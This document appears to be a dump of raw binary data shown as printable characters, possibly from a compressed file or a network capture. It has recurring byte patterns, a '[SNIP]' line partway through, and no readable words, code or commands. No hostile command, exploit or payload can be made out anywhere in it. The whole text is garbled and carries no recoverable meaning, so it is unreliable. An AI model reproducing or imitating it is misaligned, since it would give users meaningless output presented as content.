p..e4....jg'.A..{o.<..X....#..........h.k...4.{..].Yi.^..IN.....#,.a.g.H...Ec...fa.2......<S=X!.7.D.0....+....y. .aT....dw..T7.8G..J]...":......(..~:.{.L[y.....s.........i!d...*..e....!F2H.4.5..?...n.lN..[... ..&..*^.......hE......L.......K...8?Y.......z..T*...=(...G..w.`.S..
......m.I.?.Q..DT2..{..c.I...Evb'.R2......MI]D.!o. ....y.J....!.a....B..V.fO..l........3.Y|%.#,:.....(...1..P..P..`p..5dq...v...A..|:.~!...G,6rj..9~.-.1.......x.../.M
_
4.....9......~.f,.`t...0k.=4Q.F.....v.......(..'h<..... .$.\D.].3..&..z..nu....|g.I^`...z../...D.e.32.t'.
w.x.Z3
".5&...!.f..p..v.k.<......5{.g.U{..xU..C...a....T.......vX    |F.7{L(PX.|.....7...".#c..l...1...w..Ua.....'..............P....ag..k.|).0...Q.).._v.<.m.*..^i......v=6........[..q..*w...........2.k....+....*$.j......GB./...%......n....a.)&Kt....9...v......{P..#..x..)...q.).;.......1:y..g...Oyw+..Z..iE.x:.-...oC..]...l%]P..........    ..........$..]..9..).d.o.%s.....[..,.6.e..
....5R.....Z..\sp..._=.rE.cq..,.N*=.N7..6U.X......d._.l..>.#l...7e......._.T.m5....l3..l.i......|..?.b.,.h.h..M..ane~....o.r.T...uiPa..q..pX>B..l.........q.G?...b....6.....;..D....8.~..\.Q..#9.Ar.....5..UqP.
..6.9.....3=/.........@-..}.V.._...6....BGp..].......-..*.s@...p:.......s..C?z...7*..._....M..Y@C.W....F.E....K. .P$/.#'V.P...)]uO.Y-....K...gB.Y........d.XT...YH.u..l...9.Ds..g....;.6a.f; ...[...3.....v.f#.K..b.P.d......&....v.n..dG..Eg./....W.Z........\sX..Y.:C.B-..i.....O)m...O@.>...x$..>w.c.&>.xT......4.Ea...Y.a.6q........b2...4...M.....2..~..N.C....g...iRN...%.j....K#d!.h.._.>.a.]G..?..;aUU.0.d*.$H....i........,......+...[....j..........Y......^...7........rN?....lr.....~.Y@..U.Z.vE....+...u    Y..q...;.(....N...I2ID.......Ue.&.t.T..E:..(y..S.}
._...c......?E...........I.y..i.L..~.G...<.K.-.8.PG...mSl.....N..]$.....@....FLl.zf.. ...+..c%z.fu.G...wk`.>.~.)...,;z.)6.%.GX|.......\.0...4.Qo....[.u..2.{."    ....k...c.Ut...<...=u...2...#F.,g.F|,T.t.B.b..J.Z...X...)g.|.h...{...`..........t..E..b.@.(A..<...D.*.......H.=.hW.y.\.}t..S...lz..D.Z.WA...'...cN'j.......i.6..V..]%...?
.I.+....i..6]r..<7..:B.a...uC..K.Z..*+...'..1N....G...V@^^..-o.....q.L."Q.ca..\%..-.......M..H....l.CVX..}m.;.T..`}..#`.:.[.....cB.bM.#...........)    ..........(?vZA.a.6c.....[..b..R..dl5h9!..B.....~...+.MyK !.xo.:<p.O&.?.Y.=..hBy....>.$...w...7oU..;xNL....19../..Wm.|o...8E..z.x-".Y/...C..,...Oh.H.z..@....;.._.....B.....................P.....Cgf...f.....u.J.....r....."*lI.5..@...dr.I....R.....9.KHh..9.R..,IW....&P.jQH.SS*....FZ...anv-Aj[.1..ht.Fks.P;<..>.<.../...a..#.c....i.b....
.N
OF..1....%..u};.|.....@V....Q#..."..<.0..9..6...|<.%D"....    ..?.......$..@.?r....W...Tu.l~..l"..w..`....t.T..< H.OP....[X......@.. h..}..R....O.de...^.....A.C....J..i..M...:..X....|.W...6.2AW.Wq.N.2...Iv.....#...n..    .a.6.[.e1...
....lQcY_u.`N...."@>...0.8.,E..No`..*... .T"...64...Hb.g...rJ...
...X*M....Bx.HD.o..i.4..>.F. .}..._......;..._.j..X.. ..t......qu.^.....*.S../m9'P....Z.....U...5n...D...4.....TD.{.~.......-..o..%fr.....f.........}...@..G...*..........MX.......@0<.n[.h.=......hB)..L..B0.....zaHN..o.+.W.=)Y.f...!#.V...Eg.`N.dn.%.s.....p.*.gq"..^.*...{.#..
F.K.J...A......*...e\.I..W.....k.9...0.....'..+\.HLs..5....md..V
....!j.3a....r.\.    ..ZEk..E&......a...N"w.S.......
.V.anWw.f. we..9..........H.!..Q.).....i..f..l)I
...V`..I...o..,.5.^.....2)..#....K".._Ltfhd...}N.....r.&.wU.......G...b.....Y.|w..._.]..hb'..?s.$..M..O.e..*.v...:~J3.5....../..2._8Yxt..z.I    L...ZN..............Me..b..u.B..M...Y>....".%....J..../..6R..o...S....bOR&._.=L .9s....|Py\|.\5.t.    ZQp..<..H^.p.|....-e..&i#L.lU...4. ... ..g.Y....H'... .....|........@XJ..~.S&.........*"t..
...t.c.A.PZ..e.yX...........('.....?.s...w.y..\?.PvjK..+....0....3.......wa.i.a.X.Nw...
..g.2[3H......m.0...bzZ9nT..l...m....%.....4^.A.....R}....k ..p.F=.......Y...qLc..'.....
.....7..d........._ ...    .....Q.-......9..N.EoL.m......Q..ch.......g.W.L..    fe.3..L%...R&.%....V".
.L.1..+L.....f.S..%..-..m=9..,.s&Oe..Z.G.....W,..."...J..Z.......J..............P.....-if...m!,...qC.d..D.W....S.6.a.._.....KC
.L...a..J.Z...........0..!......s...I&.WD!...G'...u.5.@&7I..z6..6Z)+..2&..6...T5..r|T?Ec%T..8.....M..u..wS.^......J....?`PZ.....:q.(....=...*`5.7N....F9.....................P.....3i'.m.q..%....2)LYW..FGR:..G..............D.#...X.k...3Rq$./ ^.^R.......jjeH...x....`]<w.H[.J..h...z..e.6.i....A.....b.Y3%D....2.j..VsA...v9
.'A..Y(pP..Q=.5.0............P.....
C<...{..,B.......UW........    ..p..
....$..[..pC........G...@.X..G......mDg......U..oR.z.B....&.........    T....:{.d.$.....V .\w.+.%..%1r.....cBU..Y.|Z.#J).....8(.!z.A~, .../.u?g...&@.7.F....9D,|E..N.....eY..?...........@d..`G]....~n......uU.....).uDs{r...m5.?V."I+.4..D9.....Ux..&.....3....|s....U.=o..~......S.h1y??.ctLVA.....Z....e..G.n)......{c{3.E{...Ks.S6...G.....Y....+.Y....\....w\$1...Bd<...G.DUV1u|M{h5..N.q..dG.\.y.N....mIr%s/%..dO.m.I...Y.,..,.+.h.~O.r...#.k..0.3
...k.X
.b    ..(.k.........=a...^O0<..k^......H:.......`.%..*.......E..`.......W2].a...!.3.Z.:.z~...."..\m....z.E.a....K.:...g$~........5.....!...1b6.A..6....0....2...qB<.}..>1__.X..Qz......-.i..o......g..7X.j..1E...nG...CQBi[..)........{.....n|..p.zJ;..^_.Gp.)....d.DnA.. ....I.    .d.kkE./....|....."..J...RDs.69.E..x...xl...3WE.(.....@.U....>.A.......]|..$..*CY4..Y..E6.."-w/.#..e.m.....M....[YjO7.w+..W.*.X.*..0&..tnX..m...c...=..#.l'...T.....F..yVD<Y.4m....p...&=.8.....I#...$..u.........).s...ri(..".!.^..k...X..j..:..........O..|.1...J,....g.....cJ.....F.ZT.....VM.......I.+;<.    ....^]fA..
....!..`...'..|.v%DQ...i..-....!..2q..~..Jw......zC..8....Z..V$../....Y..:..F.#4O..X...%.............-.f......{..............P......g'.k.h.....m...2.NC...M    ...    .5..m....Fnf.t.#Y_BJn.. .....`.;%......e..%.RUt.L..\
.X....... .B...n...g0...7..I...c..d.a<@......&. <...B.Jb.J.\..!..)...K...(<..`.}........*....)oc..7..R..P.P.Jf.|.U........    ..0..,....$..@_e|........93......0....3.*m..I...F..a..A.....vu8>.....{..
.@.......x..c.....Bn.O7.......1dT.........(Nl.m...(.3GS{.Q& ......&8.a.?....0z........~ d.....Dq.....Y..wb......,$.6P{D\.U...Ua.[6...,.%....cTO:.#.....SA.........m..km...Y.4..H.a.w_..T..gg..[./.?=.    /a.e.:~L..).iR..*.Z.\D0I.",.....V-d."(.T.....    .~%......T.r.G....xI..*5.}....Xws.j......W......I..".....V..;...,.t[.........r.,......y...(..g .}3@.[...BW.b...Z`..........T...GA.:.2..[?..k..
.t...o...s.J.....:,.G+..-.....,...;.g....K........(h.
o..%...a$=k..n...pb..RT(_..x...P.6..K...'.....\......=..VeU."p.4.?P4...m...\!d5...`V.A..f?..}.o./.UW!..I@.........>.H.-..c...!~...{&..#(.n/\q.EZ{..e..=.8`5M......69.P.R\..a+.-..".."D...lY*...0..E...z.6<.%.2.~.Q.M.....7.|v....ja.T3....=.YF...V-*u.@.......O..}Z..9.......8.R.#....O........k.g..."
.t.E..8W.%NN...K;.... .Y$.4..%......)=..v...-f..d....uxy.......WY.y(.|..z....I...+..e:(0.K&"./$..,f`q..1...*.....x.@i". .....,.{v..v...../7Y.?p.uc%.V#.Rn@..2.\s.
^.
...%...>c.._......    '...;h.M..A. F.r.Z..x%6W.J.....E..+:.X.....q..K......b
B..... T........K...!.........;......9.......P....i.e'.k.y.l.....V.jd..Y...jK.t...U8M..YH..1g....f...1YB.3x..qg..|f:.*...2    F".n......DzP..../..yX.8..x.....-.\./d+.._..b..Y....f..(c...Fu.g).    ....7..c.7s.....W.26..je.(........Fl.^..%....p....2....n.........    ..}..M....$..@...u)rd.r.K....V.....j.OT..J.go!.8s...4....zT7...H.;...e..../.N...._c7IJ-...D.)....0..y.&.....7._..1.d..a..c.......?e....Wl;..nd.T.k.b<x...;......g.;j..<[.....b.o..#.(+[.....q)..w........a9|X....:x.5O...G.%r.7.=......#...(...N........1..B..>....V...,...F....,e.~......../.4...,.n......0...=L>n..&..Y.Q.$9'j....v....P..W8U18o.}....}.l...Y3.4.[...c.s......Z.=.....:xn....`...A..bsL..4...,.d.K....].C.......K.Xz._."._.#b...+...4Lb.p.q    .E.Ms.2H.e.h9.....O...q..NZ...)..<H.9.w...8.N.9..3^b..z@!`.t
N.S...gU.&.n.e.t?..|d.J?....@..............z........;c......U.GIG.......<>.....B.;    F=NM..+..*$|.3.v#.Cw+|:i.F...M...u%...k....sT* ..u-........^...w...P.*.Q.v....u.
...P...Q%...Hn..P.ht.+\O5.I%/...^.J......l.>./.v....p..#.(.xA.....5.s|1z.F.{t.N.r...."...P..L..Y+...7..m..~..R..D.[x..s....._.b[3...U|.....xy0=..5..O1I..@0....&N..K.F.}.q.G.Wo....":v.....3ovg.&..V.ZSV......j.vu..8|.+f...Z>.._............S.......P......g'.k..!...u./...h...O$G..L.r.....u..W.'....a.3b..{S......g..._{/a~.6.sSU,.A.<B..F`....]......z...L....cf..S...~).uq...f.....d.Le*....        ..8....z.NR...|..J...=...E......@...&.T5ExL._C.0....y..gP....5..........m.......P....t.b..kit..q.m.wv.o.|...3H..c..x.....6...a.223....)..[..R..}........m..R....X......c........8..XX..&..
...f....\...O......g!.)C....I......l.....f.........!X.7N...,.$.[m..Z.$5..\P..-.JY.`.x.v..Y.z.
.....    .....n....$...V.*x:..!.WYC.....,.y.._#X.h..<3....)*o`.x&6.v..:.s.......*...Pa...
t|t........[... &..../.K..(.. .X+..j....+....J;z.\..N..WnW..nb..#<..h$..9o..a[..cNg.p..y5w..[...)8!n8q/....c....6w.....q..."......P.4@..............N....Y..e...l.@wM4".......Tt.).t....fU.8...... ok\.w.....T..N...........VCP.Eu.}.../...V...t.?..$E.]......`h^.Y.S..d.V..,..1..<.t..W..X..RH(h..U.Y|.......5<.o.    .l..... BY>fl.......I.R.<WAP\U.LB..4.F..C..`+|;..a....c..}.a..7...6%..(8.8L......;.+.SN..b..BSA3".c.
l...k....R..
t....#|m.....(..R.q.7.......9.]...j.(..-.}....9SQ......DB..rW..AN7q.%g.~..K._x....3..Y....#.H..W.......jbe|.f.y:q.^f..u.3.....}...&.@.a...!.G.~.o...    R..A..]...?P.^.)..R..X..U[..#..h...by.."SQ.....U...............3U^...6)..^.......,...a&(....9.|K=..V..;t:......T.......s:....Ct.V..g:...,b%.Ki..    t.....^..S.0.#.N..'."b$..J.........yl.Q.C:...2....5]
a....`........,.o..*.......d.*.-..3-.i.r.`.....g..s.D7..."./...._......{?d..T.6R.O/.C8.C>..+&..m...7.o.krv..5|.$..........g;.....c....'K....N._c(o.}...Y..9....d...........\tL.J.. A+G0..pE.!.x..R*=...s...Af.G...Q..;..#....L..O.................`...q.(.\09./.V.+8y....D.h..Z..-..\Olx.R....    5.<.kFM].......
......../..o..1.JR.....;W.y.'o]lb..R..)..?.....u.O.
y.B.k.........................P.....#c,.m.n..$.....L..........aa.A..#..i.$b$....@.....=k. F.Q.............{........yZ..........lh.A..r..(`......KS..G.x......q.....l...,...:..;.m.....[5l...U................hV.....$C8...r1.....-0.Mc...B.F....    ..z.......$..B.."..4X..<.S...\.Oz..".J'-7....\3_..Q?-i.$.h<G ./.|G....Hz..q.......t..l.\.I.{....rD.B...|<.!...U....)(m. .P..j..7f..J.@.@..Gr.f2..X.?...p..AL..w
.'...0'...,.;B..g.$F..4f.{.If/>.`..@.....%....%..}Q.KH.Q.y.$V.6wF..8=V..K.....~....6.q....q....#1N..m\......N.3gv.[d..%@.h.z.....K..{r......p...0....b.f....f.A.n.i<e`A(..s.&_...Z;.g.{R.6.......q?.s3"....P............U`X9.d...N.x...
l...u.S....|.H`O..U..%j.Bz6........b.!k.'....cb:.B..:..1...s.L......."L..bw].'..=<.c....xl.WM.J.3..\.1[W$..$..x.8...<R..<..VEDu.i0'..\+.nj........;w..F.@.F7....u8....W./..w%..#...E[..+.|....{...T.1....WY....ZX.|V..c.7`l.........6z.....Z9...Ge...l.h.......g..6..w....d.rvx..a...8.E.b`SN...M..?.+d...8.......M>#"c.F6..D.....#@...X.....0....I...b....b.'...    ...=y.=AT?.#...7.``..{..Q..$d.ZJ..POa.#.......\..P.&........4.......}...3.i.....O....d
.i.iW...mf........Hk1....R.G......_...%|Cf.......:](... ....................P.....+e'.m.z.lp...D...<..B-..r.........).Xj....o....i.!@.(..\..".T..$.2!Q`......e...........&.s.0..W*.B.l.....N5`5.3..}.U..PJ.........$9joU:,s..3..Q.. .... M.~.A.T.}^...?.&$.I..R........).......R..W. .A)p....    ..........$..@.|.P..    ..m.;.&8...U....2gl..
1.,.........D.....z.c.(............f.n|.S..j?ET..UA....g.AOd..G...{Z.kk.ts.E.......#t(...-.....>.6'.I..r..(I.k.I....M5......s..UU+."<{.........    e....(}A.Xn.p%{jP....A...Y
f.qe...8VqX.
..
..~]=J.K....Xx..m..8.zp....D.n(%.ZB.5W.%.^"u...o6...d.>..G.3A.w.@P..d.
.,.Y.......+.B..-.N...}.u.'...Ft...}<.......w....?..F.q.>..X..c.Ti. .}. ..I.    .....H........n.:.t..>...0SwX.....Mq..F..f#.. ....gv.P..d..zP.N.....9#5B.\J\.^)`.(.Khc"T....s.g3..D.J.x.y...oL.&.t.g8.yM.........ubB...1s.....l...[.Xe+..tv.......D..h....m\.T}.T>.5...    ..._.....(.....;.jm;.........W.cI.#...    .Z..UB.\...
.......y.L#%.....{.....s.fyn..=`.......E......._..V..}.k....Y....3...CtD.{.eG.....'.c..z..z....(.r......+:'e..qc`P..1. ..N.,..~.../..6Rs..:..k]Ng1.}9.. ..7. ............=]...6..#.]......RG.-?...#.BXR9..h.`..>.T...    ......=....Ye..J..:.B<VD...s...RT..~..i..$>...    .W&.~...a.........F...........u.....................P......g..k..'l......
.......T..C.{..4.b.*..h.L.3!.N..k.L.G}....:k.    \...'_.....|...u...    B.v.k.....8....32..*d..{.x.hoV.z.N.A..m.w~.E......#\.W..p....&l.....`........N.....$..I..J.X.aLm....X3@.W.R1.C...hP......    .. .......$..@u.X..-#...N..F....h.m.D...K.^$\5./..........;x..mr..5.....l...x..I@t...5..vqZ...aF),.E......k.2..OqB..I!..m....qH...JS.......l)..........
u.....0.m...x......./.U.."P.....yr...r.tN..q..d..45V.....D.G.a.A...1.X.)]..S.....|w..M..&..lj..O..`..dc.......m .0.t(m.........o...ELuK..\.I..P..|..e..a.O..........tT..CRP.    .*..k..j..y.#..F..K...........R....J)..$..c.5,.z..2......8..X.."._..8.w.l^y....5..`..o6....z..g..&.r.ZM..c.\..........aP=9..[.$9.e@..u.?....5....=3H.{)qW....3NY.t?.LLml.\..v........G.+6..Q.Z...Y..]..Q.`.w.VX.#...........w.n.    /...J-.."S ....(N...k.F:B..av.....}.....51..}...l..Q.5.l-~.O.*s.w.f'V.Q.-u.(.j...a.f.Gykb..48.y.N...XE;\.$.D)...N.Y....M.%wbo.H...Q42..vW.iqk.0......%.....=4.... .e..V....*........,(..?@"e.;......pf..N..%i...{...P/.......&...<...H......IW`?K.4.-..]........+..............P....a.e'.k.q.ld.u0....c...>P.T.......Q..#.b....4...4.JH.%X{.j.2.    ..e.(>Bk.....)e......tM.*...YG...$..Xr
.^...k........3......x..F.....[.-..-l.<...D.dG...&!.*0.5J.Rs:.......e.....Bd..a.t:qh.fw.d...?.D...6..................P......e..k.f....u....S?...dZR.-niA...yg...T.0Bp.l.Q.8..g.&...Tt.t...]........#h.......!.v....\....;..9-*....?o~.=.\9....s)N.....?a.B..c.XH*%...8...#.IV.Xu.L)U0..L.CY....)j..Z....).
.F..........A.A
..S.8.....    ..........$....a......P.L..QY..A....!N..6.&.+....n. ..+.p..b._.....U0.....?.w.Jm;.V.....%O...6...;....-..1k......c.......H...5d[.q,....}..d...NT.5...4.i.u.N.a.cC..m...1C..].<t...~    0vP..p.T .F.......E.....!...A..c.V=.........{..SMPOr.......N......e..Sq..'..{.......:&....X..EJ...
..`..~[.:8......"....m
O.5&.:q.....J..9........(.Zm.]....
........\<.{...F"Wb...V..poF...MGUl.o;....#.#..u.w.>d.~0.I......By..to...Q......3A..u.......)...\.....N..3........1*/.....<...@L+.fL.\H]"*........1nJW..5-..w...+_..iZ..O8?co_.../D....n..:.....J..D.....7"J...f.{".....8..C...Gb'....@.... ...u..4...~.j....Y..[....Bp...y.H4.*.Q...XT...b.,..\..    X.......p.9[.U.S..kayxN.......Yi..%.

5W=....O.{..6.v.PX...4....!8.VB.!n.G.B......O..........pN.t..
..,.e..bn%.....0Z..+;zc.~..$
..]o8....vH..[.!.c8V.........Z*....RH.~.1....M.l.2.zl......K_..S..+E..>J...e...s... ......~Aa("wD....z.a=;*Y..5W..4.b~..    =.*..j....~......O$...p.~...9zx.{%G.#c..f..,.....(O.$C......n..">..v.^.VXs.z..Z{...b)...wY...L.....[.Y.h"...gx......S..R.Cx.z..us...ox.:4-"..m..t0..GpH....>.`L..ZT...y_..1...7p......f.....@..?.0.{1....._.i.........pR.v.y..D..rd.....1....[.{.R...@OI..(...L..6o.....bd..5..}...M7.b....
..V....-~...~D....+..t....!...............
.......P....I?e..m.s.....mQ..(9.....-H...@...#...3.WR.N{...D.
..Ub)...m.b.Z..z=.=;...i..J#552.6        @.Mir..F7+..f......$~.....!;.<B2...Pr....K^g.0.h...N.l..n..o#R.I[.m..#*.....x......RZ.....m..z?.Y...n.{.A.2.>)...<.....    ..u.......$..B$...X......q.6....},Et]....m.H.\..{<..S.[.&.E..1.2.....0.gg.....te....?....~%...SH...G..3J.A7@'dT..Mu.p..D.L.%e......d..7....C.....
7..{.'q21.^..~.........t.Y.~.....ko..4.c..J.2...=).l?.F/..y.V...i..V>..Y..._...k....>.G&.h$..i....I.45...B.L....6..M....    F.......|.dP..@L.F.I=.7.q...-...W..........n........I.w...J......[.v.-.G..i.....M._....w1.Eo
...Tq....L=9k.8.J..(..Vk.^cxz\......BI.:...AxrP.d.8..|.Go....7..~....v'.X.O|...y......ya.6..az.'"75
..Z....=.i.7#.DD...../....fG(......O.m.`....$>...-M^n.....XR..{aE.#G .B.:.. .6.e&.xd.T.../......+.b..q.F...4`.@.|.1}..L '...e
..<.jn4s<.ukv.7}..;1..{.i..%q.|F..`..../..;E.ba.%...H.r..    ~...y.4}..z\|.P?8..p@..=U.U....]<.a......ex..bl`;,d.P.u......Znv.-O..............^ ^_.=^.U....o..9...)....3..EF..6..80.T..y..._.......#.O#...] TLC...&I...w..a..H~ZQ-)......Z:.M/.6 ....@.nF...;.    v.:.!W..Q.0F..x    ..|..v"Z..... .4..M...."...s.#e..............$.......P....D.e,.ki...q.u./*../...C+.z4.y4"..Xh....D7.H.....].....N8.."m.*..-]..;...KW.u+ ...8Wj@..$.r.3..&Lk3...........(N...Pu.RxP..6h...-..8.T....V.FLE..y....7....".m...W?...0WYY..] H.....L..g.YO......| b.'.d....    .....7....$..@....d..J;.c...(M@..p....B.. ^&T.E.GHu...>C...q
.!=l&K....j..Md..
.h.lk..Ba..%.C.^t..i. .;n..8. $~.Ek+.n.dN..|O./|4..).T."..*w.0j....0!.{b:.8^i.r...q}.+..K..Y]...J.N...r...../...(.
.w.*4jD...p.8.Vo:.8;:............y.z...N.&..0.....Q........I.R.8].4.+..qT_....k..pI........oH.w..._RD.i.M.2$).9...k.~.h..0M8K."K....'...,....4r..h...=.....c.k.x,.t...x..s. ..5....B    ..,.Q(h;..>.d..6..D...B....7.X^io`.mHu.v&...h.......v...-h.+..E%.....l...b,.P.n+..o5ba..5....].}{,.-.......!.Z......y.ZU.d..~...a,.L.......rZO%K*....h...X..!|]:;..^<..3.t.T..M@...BD....
...p.....kO.4uF2.../..8.{...P.u..P:;?.+i...#...<.B..._..>X._p...)dd.K.\q...m.?Es..b.......e..L......$.....Or..NC..!.J..g...v1_h...2........uZ.....'.9...(:.P......d...-.`.CS1.x.lf.../..t.Y?....?:S...~..i..v.b..Z....FF]o>......;b.....sY&Bg.F....@h.e.7..iJ.R.\fa1..w.s..E...Vy./......Zr..[s[......|u"K...]..U?mf.#...}ZG9.....Z..+.R......_...O....(+..!t..$.E..e.fi..p(2{...D....Z.e.k....`..XT..#..{.R..f'K..y.i..&UM.x."]Y....3HM.)E.R..rE..    Y^.{|.q..?....mMX..Xx..$.......&XJJ\...2._C.3..............>.......P......e,.kir..%.....\!.T.....(.fZ......Q....7.E-gtf...(f..s..:..)..!T.0......:.U.j....`...P."s-53T<..........`.....T4...[#X..jF..........XY.v!.q.45h......g$u........T.Fj..H..IU......"tFi.0.7....r.."..Ay^_...........X.......P....e3c'.m.y....u....x.m........5..p.#(D.8.3....    .T 3...v....?...?...#.....;.^=s...US++8..k.k........4.O3T...}.y^..&.s..5..(...y...U..[.D.....,H.B.T.I..8........J.+5..$..I5R.....8N...
.........D:....L..A....    .....X....$..@y......NRN.i....Cgi.^w@911".MpgK...dY.{U.....e..T.....N{.....P
....lH/...3....ki....7C...L.....V.8|..Va....x.~.....G.....{...*..~.....[.0.q|...9d.....|O=.P.....D..@..Z
6.....$..G...C.uZ.Io."`!....z    ....=..^z....U..R.u..e..V..q8......y4.Z.....F..a...F.6...._...-8.    cY@....[.....p'.O..\.....N.r......A....>......NJZ.h......6,...V......E%...biB.....T.]#...Vaq..r;.Zzj.!.[.....AI.bX%......'.Q.,..V...@..?........0{R.2......{E....U.....yW..Ix.%.u.F.i._a.`y..{...Z6}.T....k5.......X.2....=6;...=......... ml.QF;.Ml1m.fT..>$    .b_.......{)y..j..W..|...\1{P..4F.x...4&...U_(.>@.b..h..U.a..'..ss...A.ld.^.c.....f..e..0. ..|.3.z..L..?.......n.=...P.....5cJ.E....2w.......a....'.....R.{;..u....t.X;.4}...Hd.....s....
.Up..K.A*B.~V#..X.....l....._.AE.......|?.D+....R*......m.. v.b.{F.w....?..f.0."(....q..Q....y...u.......2P.<.uvg+.......>D.u.....Xw?.......-..    .u....&.....o..H.+...&> ..<...X.#..s...W..o..z.>W.....T..XQ..,...D.@)....E.r.P,R;$.1."...*..........}@v.Z..!.....jW..!.....<.hp=.
d...?1...........O.2y2+..m............pg.....q?....y....!......@.....&......r.......P......a,.k.n.l...m    ....[..dyS!.1Q.=.F.u.l.C.....dE..,...f...y.pRt....
..x...L$..S*.@o....S..W.lL.D.`.%v..jl+.7i.;.B.=..W".c.zq...C.T8....(...OMpS.w.._&..........y..z......$..I5.T.@R!/......^.F......c..........    ..(..z....$.....t.c..^.<.^.....2..n.......E.......h.....H.........h.............`^..5.WY..lo<U.(....<w.uM...F.))K9....`..2...t..\7..a>..y..H.f.T7.[.zH..K.......C..P..|...4.L:M..}Z&G5......    .p.~-.,.2...Y.zc..o    c(
.`M76&.7b.{\t..b.a...t.SE.B.G.s....>.s....1
...*..z.yQ27........Q....!..H.......Sou...R.w'P.g..Q....<.p.    M...6v.F...9<8...,HYZ..H|DT...F..M{<..._dKA^O"....{u.......'ys.....Qj..0v.|........cc..T..%.#H..~.Y].$.c...M..,.W4.S..UeB.1.:>.T.;T].^....y.f......Q.*...@,.....o.,.6].5.^...._.............+.U.h..u.OF.']....Dwl[O.
(....6-t.O...d..y..An.}%EL......._..........^..B.e.ca..Y...3.mdm...........D9...f8.Iz].....u..N\.....Hv.p...uW....I].EG<.....CO.rd...jo.j.p.PDs..>7."T.nqy]..Q.e.%.....G?
S.9+....[q5D952HvX..g.
$.Ak...?...kSO.`.>.....].g.......9x.{....&5.....v`.....CNW....X.F.........5.=.R    .L..-......\.....dC.q.M.vRy...A3m..5.
..C).......cYP:....l...fw,Y...(./VB"X\e.o....Y....,..&..    ..F.)...ie.......d@..L.M.}.....C.    ..
.L.(.N=...4X.w.O...G.glbww....&......m....-.....6ad#a...J=.V......|.no~L
.~M./......=..c..T....mj.7...z-.Y.U.Y.[>Nn..o.!.}.;...K.(.{.+nE............^1ku]L]1..>..pJ.M.H........pt.&.....Y......n7Hg.....l.9..H...$'.z.a3.kE./E[Z...r... ...a.:.....k...@..Z.m..w...Z%}&.(._....."=..*...s.u.e. 'h.7.f.9#....
W..L...B.}..|...nEb...,.f.m.8U%.v..7.1...>I....F.F.w.lX(...].^....`i|..j..%]...0......3..............P....=3e..m.[....l.6..|.&...I..ft.q.s.m...1.I.......0A1b.J.P.U.f.Ea...4......-1.DKQ.SS+6...Zr<.C..n.0..c....^.G5K....!.,.zh....J..1....0.39..z..O7.....6.....:X#.u.EZ..o...........u@NR...Lz)(.t..v.V..........    ..........$..@w.v.........._wU.
...d......+.1..n.4....CBC.....Np..V.....&f.....wK...Zc.../..l8.D..........t.Q..c..P....2..;...+...,SY.~.-..&I$.f|Mz.....xhp..P\.._..R.+....L$.....r.>.y..<!....f.R_u0..).$.|..z!.G...8...Xm0.D\.^G.._....... ...]'....V`.ww....G.G~<....9......4........j=.h..Y....J......|.#....jGo..F..oNU........@../.."<.3l...i.FDg.....<..?>..e..1.l~    7<.6    .v.3.S..e3......}...z.p............/...85.K..Z....0.k.........U.zMq..l`.C...Bp.l.....)g..~...y...L.;..W........{....C.S.k....JZi......{..jzr2..J.Om#......q.d..2.
....p...s.}Oi~.g..a..~.
...[SNIP]...
.
..    .....2.$..m.\w.....R...?.....L...~A.q6_.\d.j.........................P......g..k.r!....u.H)..:...4......r...*..f3#@.g.x.8g=.p...L.9.j.L.".o'.(....e.e...Q...Q.5..~C..i.....;ZT/..Z......~z.Xe.o...)<%...|.........Z...8r.........[b..|.t..q.2.W.....U....L.9
...F.S..i[w).@).c.M......    ..........$..@...p..X8u&.-bh9..R:L%.S.)....8.T.3....    ....J.1h{.7...UKI..'...#..h .*.S.......L..B.R....m.C .......&Zp;.....A.7{.O-..AK..l;.^v.d.....f..{<...0.%...lr.P{..uNj...}.....K\.O.x..a...Sx)...d......;..Jlj..8'..s..^p......m}h..5'.G..x*....{..jh.Y..
h f?J./.+p....*..i/l...a.W....../....t.<.`....*...a....
7... .....;.....Xl=l]q.:......F?.........U...y....n...%...c:...aJ.!.h.....9..Gq.... ......P)..f.$t.K...Lf.$..M.V..}.?.6.....4[d(^S.Q..%...    ........t....z.........G.9b..........
;.Y,...j..pQ.I.D.G.e(....T.`......,C....j............".~....N......U....M*...X.Pb...(8....j7.a.w...W.I.#.....n...v.I.2......cU..{..@.S.~..........V.....w..Z/....^@q.9..s...?..XZ...^.!*e.}......."n...,fp..x..,\.Z..]...!.....|.@D.......!>.NKm.[.9.mF!.=f.M..._......dB......E.I..y..n-.N.nL..E..JRu.E...Y.d.2|.P1
..M.6W|6m    -....#:.0=.....#g.2D..X)=WN..E..u.}......ev.Q...l... ..P`..K.....cJM....................U....O!.D.. ...N@..R'L.@.k..P....................P....=/e'.m.{..0.t..[<(..vb....9e..    .....N...A..K.e.|.B....zDgsI.[................ap...V@......D~....|.......72.5.\..6..M.....O....+E,.ub4."H...H ..j1..Z)....    ..7..oy...-.(WY...f.R......C....<9......-.......................P......e,.k.u ,..u<..T....+2.3.H...Z.W:h..[.... .4}..d.P;.....).V[..-9
C...".o.....*.'.d..S. .+L-.{z.D9q.....{....! ....O..$....q`......I#....t.....Wm...b.H.-cS....H......M.#..h.&W.xN.{...;^...S....;.u........    ..n.......$..A.m*.D....3.q...m.+HC.6F.jIF..^....S    O....A..6..$..7.?.......h..D.1hr..g....\wpV...{)O-..w.h.ze\..DE..
..0.....R...&..G....eJ....Gd...Wo._..C....R.._....
!......i...
p.99.X.z(...;....q..?..Z..K...../.....Y.*|>.1..G..v3Y/.u....z.H.    ..%.... ..;..H.!..Y.W{......U.3..Yu...
o......rt..Z.Y@.&*...(si..X..."@/.y..#.',qd..$E..-.NwW3.0`.X.F..P..o..X>..m8...e.....q.Tq;1ep....................K.}&...7....y.....wa.2..d..B/U..iB.I...'...]K8....6?...c.._.$M..R../.=P+..kd*.!.u'GB.4...#W.?..n*.p.iwC'.Yc..Hw....#...K...L.l.....[.c.z......*(.&s<!...z.IY..)..u..|..H..9$......*Q...g9=.dU..wh...~X7........i.l.(..m..n|g.{..u...Y..f.E|....gx....=g"..).."..9..@.2.-0..d..U...I-a...h0..(7).....@j'<....l1., .E?.q...........#1.G...1...e.!..".....'j}..Gv.....R#?....    ..-.R./..Z....v....]...8...i......-.[@...f.d.xO...c.p..z."A..!{...u..]d..8~......q..9S.|;........5.....T..?LQ..y..."/h.k.E.......y..............P.....=g'.m.j ...u.l5...........y........y......#p..q^..;..<O..wLPl.+zL.]..~...ML._p....."U..gr.=.V.A..=c...cNN.-M..$.^>....wR.f...d.....L....F/...E-..    K.9:y....)....1k......D.z.W
